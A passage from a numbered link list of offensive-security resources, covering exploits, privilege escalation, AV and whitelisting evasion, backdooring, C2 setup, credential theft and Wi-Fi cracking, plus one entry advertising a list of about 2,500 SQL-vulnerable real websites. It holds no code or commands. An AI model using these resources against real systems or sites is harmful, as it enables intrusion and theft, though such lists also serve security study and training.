https://www.exploit-db.com/download/44830.rb -166-nbtscan Cheat Sheet: https://highon.coffee/blog/nbtscan-cheat-sheet/ -167-neat-tricks-to-bypass-csrfprotection: www.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection -168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2: https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/ -169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts): https://medium.com/p/868a7bd7f692 -170-Nmap Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet/ -171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ -172-Phishing with PowerPoint: https://www.blackhillsinfosec.com/phishing-with-powerpoint/ -173-hide-payload-ms-office-document-properties: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/ -174-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -175-How to Build a C2 Infrastructure with Digital Ocean – Part 1: https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/ -176-WordPress Penetration Testing using Symposium Plugin SQL Injection: http://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection -177-Manual SQL Injection Exploitation Step by Step: http://www.hackingarticles.in/manual-sql-injection-exploitation-step-step -178-MSSQL Penetration Testing with Metasploit: http://www.hackingarticles.in/mssql-penetration-testing-metasploit -179-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file -180-MySQL Penetration Testing with Nmap: http://www.hackingarticles.in/mysql-penetration-testing-nmap -181-NetBIOS and SMB Penetration Testing on Windows: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows -182-Network Packet Forensic using Wireshark: http://www.hackingarticles.in/network-packet-forensic-using-wireshark -183-Escape and Evasion Egressing Restricted Networks: https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/ -183-Awesome-Hacking-Resources: https://github.com/vitalysim/Awesome-Hacking-Resources -184-Hidden directories and les as a source of sensitive information about web application: https://medium.com/p/84e5c534e5ad -185-Hiding Registry keys with PSRe ect: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 -186-awesome-cve-poc: https://github.com/qazbnm456/awesome-cve-poc -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -188-Post Exploitation in Windows using dir Command: http://www.hackingarticles.in/post-exploitation-windows-using-dir-command 189-Web Application Firewall (WAF) Evasion Techniques #2: https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 -190-Forensics Investigation of Remote PC (Part 1): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1 -191-CloudFront Hijacking: https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/ -192-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato: http://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato -194-How to intercept TOR hidden service requests with Burp: https://medium.com/p/6214035963a0 -195-How to Make a Captive Portal of Death: https://medium.com/p/48e82a1d81a/share/twitter -196-How to find any CEO’s email address in minutes: https://medium.com/p/70dcb96e02b0 197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation: https://www.exploit-db.com/download/44630.txt -199-Microsoft Word upload to Stored XSS: https://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/ -200-MobileApp-Pentest-Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet -201-awesome: https://github.com/sindresorhus/awesome -201-writing arm shellcode: https://azeria-labs.com/writing-arm-shellcode/ -202-debugging with gdb introduction: https://azeria-labs.com/debugging-with-gdb-introduction/ -203-emulate raspberrypi with qemu: https://azeria-labs.com/emulate-raspberry-pi-with-qemu/ -204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method: https://medium.com/p/a5807a9a8056 -205-A Red Teamer's guide to pivoting: https://artkond.com/2017/03/23/pivoting-guide/ -206-Using WebDAV features as a covert channel: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/ -207-A View of Persistence: https://rastamouse.me/2018/03/a-view-of-persistence/ -208- pupy websocket transport: https://bitrot.sh/post/28-11-2017-pupy-websocket-transport/ -209-Subdomains Enumeration Cheat Sheet: https://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html -210-DNS Reconnaissance – DNSRecon: https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/ -211-Cheatsheets: https://bitrot.sh/cheatsheet -212-Understanding Guide to Nmap Firewall Scan (Part 2): http://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2 -213-Exploit Office 2016 using CVE-2018-0802: https://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html -214-windows-exploit-suggester: https://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html -215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS: https://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html -216-IDS, IPS AND FIREWALL EVASION USING NMAP: https://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html -217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet 218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals: https://gbhackers.com/web-application-security-tools-resources -219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet -220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing: https://gbhackers.com/top-500-important-xss-cheat-sheet -221-USBStealer – Password Hacking Tool For Windows Machine Applications: https://gbhackers.com/pasword-hacking -222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals: https://gbhackers.com/mobile-application-penetration-testing -223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now: https://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now -224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method: https://gbhackers.com/manual-sql-injection-2 -225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers: https://gbhackers.com/email-spoofing-exploiting-open-relay -226-Email Header Analysis – Received Email is Genuine or Spoofed: https://gbhackers.com/email-header-analysis -227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals: https://gbhackers.com/cyber-threat-intelligence-tools -228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool: https://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool -229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -230-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -231-A8-Cross-Site Request Forgery (CSRF): https://gbhackers.com/a8-cross-site-request-forgery-csrf -232-Fully undetectable backdooring PE File: https://haiderm.com/fully-undetectable-backdooring-pe-file/ -233-backdooring exe files: https://haiderm.com/tag/backdooring-exe-files/ -234-From PHP (s)HELL to Powershell Heaven: https://medium.com/p/da40ce840da8 -235-Forensic Investigation of Nmap Scan using Wireshark: http://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark -236-Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki -237-wifi-arsenal: https://github.com/0x90/wifi-arsenal -238-XXE_payloads: https://gist.github.com/staaldraad/01415b990939494879b4 -239-xss_payloads_2016: https://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016 -240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.: https://github.com/alebcay/awesome-shell -241-The goal of this repository is to document the most common techniques to bypass AppLocker.: https://github.com/api0cradle/UltimateAppLockerByPassList -242-A curated list of CTF frameworks, libraries, resources and softwares: https://github.com/apsdehal/awesome-ctf -243-A collection of android security related resources: https://github.com/ashishb/android-security-awesome -244-OSX and iOS related security tools: https://github.com/ashishb/osx-and-ios-security-awesome -245-regexp-security-cheatsheet: https://github.com/attackercan/regexp-security-cheatsheet -246-PowerView-2.0 tips and tricks: https://gist.github.com/HarmJ0y/3328d954607d71362e3c -247-A curated list of awesome awesomeness: https://github.com/bayandin/awesome-awesomeness -248-Android App Security Checklist: https://github.com/b-mueller/android_app_security_checklist -249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat: https://github.com/brannondorsey/wifi-cracking -250-My-Gray-Hacker-Resources: https://github.com/bt3gl/My-Gray-Hacker-Resources -251-A collection of tools developed by other researchers in the Computer Science area to process network traces: https://github.com/caesar0301/awesome-pcaptools -252-A curated list of awesome Hacking tutorials, tools and resources: https://github.com/carpedm20/awesome-hacking -253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.: https://github.com/cn0xroot/RFSec-ToolKit -254-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -255-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -256-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -257-A curated list of awesome forensic analysis tools and resources: https://github.com/cugu/awesome-forensics -258-Open-Redirect-Payloads: https://github.com/cujanovic/Open-Redirect-Payloads -259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook -260-Windows memory hacking library: https://github.com/DarthTon/Blackbone -261-A collective list of public JSON APIs for use in security.: https://github.com/deralexxx/security-apis -262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.: https://github.com/devsecops/awesome-devsecops -263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi: https://github.com/diasdavid/awesome-hacking-spots -264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups: https://github.com/djadmin/awesome-bug-bounty -265-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom: https://github.com/enddo/awesome-windows-exploitation -267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development: https://github.com/FabioBaroni/awesome-exploit-development -268-A curated list of awesome reversing resources: https://github.com/fdivrp/awesome-reversing -269-Git All the Payloads! A collection of web attack payloads: https://github.com/foospidy/payloads -270-GitHub Project Resource List: https://github.com/FuzzySecurity/Resource-List -271-Use your macOS terminal shell to do awesome things.: https://github.com/herrbischoff/awesome-macos-command-line -272-Defeating Windows User Account Control: https://github.com/hfiref0x/UACME -273-Free Security and Hacking eBooks: https://github.com/Hack-with-Github/Free-Security-eBooks -274-Universal Radio Hacker: investigate wireless protocols like a boss: https://github.com/jopohl/urh -275-A curated list of movies every hacker & cyberpunk must watch: https://github.com/k4m4/movies-for-hackers -276-Various public documents, whitepapers and articles about APT campaigns: https://github.com/kbandla/APTnotes -277-A database of common, interesting or useful commands, in one handy referable form: https://github.com/leostat/rtfm -278-A curated list of tools for incident response: https://github.com/meirwah/awesome-incident-response -279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys: https://github.com/meitar/awesome-lockpicking -280-A curated list of static analysis tools, linters and code quality checkers for various programming languages: https://github.com/mre/awesome-static-analysis -281-A Collection of Hacks in IoT Space so that we can address them (hopefully): https://github.com/nebgnahz/awesome-iot-hacks -281-A Course on Intermediate Level Linux Exploitation: https://github.com/nnamon/linux-exploitation-course -282-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -283-A curated list of awesome infosec courses and training resources.: https://github.com/onlurking/awesome-infosec -284-A curated list of resources for learning about application security: https://github.com/paragonie/awesome-appsec -285-an awesome list of honeypot resources: https://github.com/paralax/awesome-honeypots 286-GitHub Enterprise SQL Injection: https://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493 -287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis: https://github.com/secfigo/Awesome-Fuzzing -288-PHP htaccess injection cheat sheet: https://github.com/sektioneins/pcc/wiki -289-A curated list of the awesome resources about the Vulnerability Research: https://github.com/sergey-pronin/Awesome-Vulnerability-Research -290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF: https://github.com/swisskyrepo/PayloadsAllTheThings -291-A collection of Red Team focused tools, scripts, and notes: https://github.com/threatexpress/red-team-scripts -292-Awesome XSS stuff: https://github.com/UltimateHackers/AwesomeXSS -293-A collection of hacking / penetration testing resources to make you better!: https://github.com/vitalysim/Awesome-Hacking-Resources -294-Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet -295-Decrypted content of eqgrp-auction-file.tar.xz: https://github.com/x0rz/EQGRP -296-A bunch of links related to Linux kernel exploitation: https://github.com/xairy/linux-kernel-exploitation -297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -298-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -299-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: -301-Reading Your Way Around UAC (Part 1): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html -302--Reading Your Way Around UAC (Part 2): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html -303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2): https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/ -304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/p/29d034c27978 -304-Automating Cobalt Strike,Aggressor Collection Scripts: https://github.com/bluscreenofjeff/AggressorScripts https://github.com/harleyQu1nn/AggressorScripts -305-Vi Cheat Sheet: https://highon.coffee/blog/vi-cheat-sheet/ -306-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -307-LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/ -308-Systemd Cheat Sheet: https://highon.coffee/blog/systemd-cheat-sheet/ -309-Aircrack-ng Cheatsheet: https://securityonline.info/aircrack-ng-cheatsheet/ -310-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/?p=7212 -311-Wifi Pentesting Command Cheatsheet: https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/ -312-Android Testing Environment Cheatsheet (Part 1): https://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/ -313-cheatsheet: https://randomkeystrokes.com/category/cheatsheet/ -314-Reverse Shell Cheat Sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/ -315-Linux Commands Cheat Sheet: https://highon.coffee/blog/linux-commands-cheat-sheet/ -316-Linux Privilege Escalation using Sudo Rights: http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights -317-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -318-Linux Privilege Escalation by Exploiting Cronjobs: http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ -319-Web Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -320-Webshell to Meterpreter: http://www.hackingarticles.in/webshell-to-meterpreter -321-WordPress Penetration Testing using WPScan & Metasploit: http://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit -322-XSS Exploitation in DVWA (Bypass All Security): http://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security -323-Linux Privilege Escalation Using PATH Variable: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -324-VNC tunneling over SSH: http://www.hackingarticles.in/vnc-tunneling-ssh -325-VNC Pivoting through Meterpreter: http://www.hackingarticles.in/vnc-pivoting-meterpreter -326-Week of Evading Microsoft ATA - Announcement and Day 1: https://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html -327-Abusing DNSAdmins privilege for escalation in Active Directory: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -328-Using SQL Server for attacking a Forest Trust: https://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html -329-Empire : http://www.harmj0y.net/blog/category/empire/ -330-8 Deadly Commands You Should Never Run on Linux: https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ -331-External C2 framework for Cobalt Strike: https://www.insomniacsecurity.com/2018/01/11/externalc2.html -332-How to use Public IP on Kali Linux: http://www.hackingarticles.in/use-public-ip-kali-linux -333-Bypass Admin access through guest Account in windows 10: http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10 -334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports): http://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports -335-Bypass SSH Restriction by Port Relay: http://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay -336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key): http://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key -337-Bypass UAC in Windows 10 using bypass_comhijack Exploit: http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit -338-Bind Payload using SFX archive with Trojanizer: http://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer -339-Capture NTLM Hashes using PDF (Bad-Pdf): http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf -340-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/ -341-Detect SQL Injection Attack using Snort IDS: http://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/ -342-Beginner Guide to Website Footprinting: http://www.hackingarticles.in/beginner-guide-website-footprinting/ -343-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -344-Wifi Post Exploitation on Remote PC: http://www.hackingarticles.in/wifi-post-exploitation-remote-pc/ -335-Check Meltdown Vulnerability in CPU: http://www.hackingarticles.in/check-meltdown-vulnerability-cpu -336-XXE: https://phonexicum.github.io/infosec/xxe.html -337-[XSS] Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -338-Engagement Tools Tutorial in Burp suite: http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite -339-Wiping Out CSRF: https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f -340-First entry: Welcome and fileless UAC bypass: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ -341-Writing a Custom Shellcode Encoder: https://medium.com/p/31816e767611 -342-Security Harden CentOS 7 : https://highon.coffee/blog/security-harden-centos-7/ -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: https://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html -344-MySQL: https://websec.ca/kb/CHANGELOG.txt -345-Deobfuscation of VM based software protection: http://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf -346-Online Assembler and Disassembler: http://shell-storm.org/online/Online-Assembler-and-Disassembler/ -347-Shellcodes database for study cases: http://shell-storm.org/shellcode/ -348-Dynamic Binary Analysis and Obfuscated Codes: http://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf -349-How Triton may help to analyse obfuscated binaries: http://triton.quarkslab.com/files/misc82-triton.pdf -350-Triton: A Concolic Execution Framework: http://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: https://github.com/JonathanSalwan/Tigress_protection -352-What kind of semantics information Triton can provide?: http://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/ -353-Code coverage using a dynamic symbolic execution: http://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/ -354-Triton (concolic execution framework) under the hood: http://triton.quarkslab.com/blog/first-approach-with-the-framework/ -355-- Stack and heap overflow detection at runtime via behavior analysis and Pin: http://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/ -356-Binary analysis: Concolic execution with Pin and z3: http://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/ -357-In-Memory fuzzing with Pin: http://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/ -358-Hackover 2015 r150 (outdated solving for Triton use cases): https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py -359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection: https://gbhackers.com/skipfish-web-application-security-scanner -360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains: https://gbhackers.com/sublist3r-penetration-testers -361-bypassing application whitelisting with bginfo: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -362-accessing-clipboard-from-the-lock-screen-in-windows-10: https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/ -363-bypassing-device-guard-umci-using-chm-cve-2017-8625: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -364-defense-in-depth-writeup: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/ -365-applocker-case-study-how-insecure-is-it-really-part-1: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -366-empires-cross-platform-office-macro: https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/ -367-recon tools: https://blackarch.org/recon.html -368-Black Hat 2018 tools list: https://medium.com/p/991fa38901da -369-Application Introspection & Hooking With Frida: https://www.fuzzysecurity.com/tutorials/29.html -370-And I did OSCP!: https://medium.com/p/589babbfea19 -371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests: https://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html -372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals: https://gbhackers.com/threat-intelligence-tools -373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: https://techincidents.com/penetration-testing-cheat-sheet/ -374-privilege escalation: https://toshellandback.com/category/privilege-escalation/ -375-The Complete List of Windows Post-Exploitation Commands (No Powershell): https://medium.com/p/999b5433b61e -376-The Art of Subdomain Enumeration: https://blog.sweepatic.com/tag/subdomain-enumeration/ -377-The Principles of a Subdomain Takeover: https://blog.sweepatic.com/subdomain-takeover-principles/ -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!: https://medium.com/p/b250fb40af82 -379-The Solution for Web for Pentester-I: https://medium.com/p/4c21b3ae9673 -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended: https://www.hackingloops.com/hacking-tricks/ -383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology: https://www.hackingloops.com/exploitation-terminology/ -384-How Hackers Kick Victims Off of Wireless Networks: https://www.hackingloops.com/kick-victims-off-of-wireless-networks/ -385-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -386-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom: https://www.hackingloops.com/msfvenom/ -388-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky: https://www.hackingloops.com/payloads-via-usb-rubber-ducky/ -390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1: https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/ -391-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -392-Cracking NTLMv1 Handshakes with Crack.sh: http://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/ -393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch: https://medium.com/p/d5e92843e64a -394-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -395-Windows Privilege Escalation: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation -396-Removing Sender’s IP Address From Email’s Received: From Header: https://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header -397-Dump Cleartext Password in Linux PC using MimiPenguin: http://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin -398-Embedded Backdoor with Image using FakeImageExploiter: http://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter -399-Exploit Command Injection Vulnearbility with Commix and Netcat: http://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat -400-Exploiting Form Based Sql Injection using Sqlmap: http://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap -401-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -402-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks -403-Command Injection to Meterpreter using Commix: http://www.hackingarticles.in/command-injection-meterpreter-using-commix -404-Comprehensive Guide to Crunch Tool: http://www.hackingarticles.in/comprehensive-guide-to-crunch-tool -405-Compressive Guide to File Transfer (Post Exploitation): http://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation -406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide): http://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng -407-How to Detect Meterpreter in Your PC: http://www.hackingarticles.in/detect-meterpreter-pc -408-Easy way to Hack Database using Wizard switch in Sqlmap: http://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap -409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn): http://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn -410-Create SSL Certified Meterpreter Payload using MPM: http://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm -411-Port forwarding: A practical hands-on guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide -412-Exploit Dev 101: Jumping to Shellcode: https://www.abatchy.com/2017/05/jumping-to-shellcode.html -413-Introduction to Manual Backdooring: https://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html -414-Kernel Exploitation: https://www.abatchy.com/2018/01/kernel-exploitation-1 -415-Exploit Dev 101: Bypassing ASLR on Windows: https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html -416-Shellcode reduction tips (x86): https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86 -417-OSCE Study Plan: https://www.abatchy.com/2017/03/osce-study-plan -418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400): https://www.abatchy.com/2017/10/defcamp-dotnot -419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE: https://www.ambionics.io/ -420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]: https://www.cityofhackerz.com/sql-vulnerable-websites-list-2017 -421-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/tag/forensics/ -422-windows-kernel-logic-bug-class-access: https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html -423-injecting-code-into-windows-protected: https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html -424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE: https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire -425-Automated Derivative Administrator Search: https://wald0.com/?p=14 -426-A Red Teamer’s Guide to GPOs and OUs: https://wald0.com/?p=179 -427-Pen Testing and Active Directory, Part VI: The Final Case: https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ -428-Offensive Tools and Techniques: https://www.sec.uno/2017/03/01/offensive-tools-and-techniques/ -429-Three penetration testing tips to out-hack hackers: http://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/ -430-Introducing BloodHound: https://wald0.com/?p=68 -431-Red + Blue = Purple: http://www.blackhillsinfosec.com/?p=5368 -432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog: https://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/ -433-PrivEsc: Unquoted Service Path: https://www.gracefulsecurity.com/privesc-unquoted-service-path/ -434-PrivEsc: Insecure Service Permissions: https://www.gracefulsecurity.com/privesc-insecure-service-permissions/ -435-PrivEsc: DLL Hijacking: https://www.gracefulsecurity.com/privesc-dll-hijacking/ -436-Android Reverse Engineering 101 – Part 1: http://www.fasteque.com/android-reverse-engineering-101-part-1/ -437-Luckystrike: An Evil Office Document Generator: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator 